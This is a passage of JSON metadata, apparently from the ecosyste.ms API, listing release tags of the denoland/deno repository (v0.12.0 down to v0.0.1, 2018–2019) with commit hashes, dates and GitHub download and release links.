","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0